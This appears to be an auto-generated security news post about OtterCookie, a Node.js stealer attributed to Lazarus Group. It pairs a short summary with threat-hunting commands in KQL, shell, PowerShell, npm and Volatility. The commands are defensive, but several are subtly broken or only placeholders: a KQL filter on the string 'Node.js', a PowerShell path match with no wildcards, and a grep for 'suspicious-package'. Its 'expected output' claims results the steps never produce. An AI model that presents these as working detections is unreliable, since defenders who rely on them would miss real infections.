OtterCookie Malware: Lazarus Group’s Stealthy Data Stealer

By /

Listen to this Post

Featured Image
A new malware named OtterCookie has been identified as part of North Korea’s Lazarus Group operations. This stealer disguises itself in fake job offers and seemingly legitimate Node.js repositories, targeting finance and tech professionals. It exfiltrates:
– Browser credentials
– macOS keychain data
– Cryptocurrency wallets

Unlike traditional malware, OtterCookie operates without a local implant, making detection harder.

Key Resources:

You Should Know:

1. Detecting OtterCookie with KQL

Use this Kusto Query Language (KQL) rule to hunt for OtterCookie in Microsoft Defender XDR:

DeviceProcessEvents
| where ProcessCommandLine contains "Node.js" 
| where ProcessCommandLine has_any("--inspect", "--require")
| where InitiatingProcessFileName endswith "cmd.exe"
| project Timestamp, DeviceName, ProcessCommandLine

2. Linux/MacOS Threat Hunting

Check for suspicious Node.js processes running with debugging flags:

ps aux | grep -E "node.(--inspect|--require)"

Monitor unauthorized network connections:

lsof -i -P -n | grep -i "node"

3. Windows Command for Process Analysis

List processes with Node.js involvement:

Get-Process | Where-Object { $_.Path -like "node" } | Select-Object Id, Name, Path

4. Blocking Malicious Repos

If you’re a developer, verify Node.js dependencies:

npm audit

Check for known malicious packages:

npm ls --all | grep -i "suspicious-package"

5. Memory Forensics (Volatility)

Extract Lazarus Group artifacts from memory dumps:

volatility -f memory.dump --profile=Win10x64_19041 pslist | grep -i "node"

What Undercode Say:

OtterCookie exemplifies fileless malware trends, leveraging trusted tools like Node.js. Defenders must:
– Monitor debugging flags (--inspect, --require).
– Restrict unauthorized Node.js execution via AppLocker (Windows) or SELinux (Linux).
– Analyze network traffic for C2 communications.

Expected Output:

  • Detected Node.js processes with unusual arguments.
  • Identified lateral movement via PowerShell or WMI.
  • Blocked malicious npm packages in CI/CD pipelines.

Prediction:

Lazarus Group will likely enhance OtterCookie’s evasion by:

  • Using legitimate CDNs for payload delivery.
  • Polymorphic scripting to bypass signature-based detection.
  • Targeting cloud developer environments (e.g., VS Code extensions).

Stay vigilant—assume every job offer attachment is malicious. 🛡️

IT/Security Reporter URL:

Reported By: 0x534c Cybersecurity – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram

Related Posts: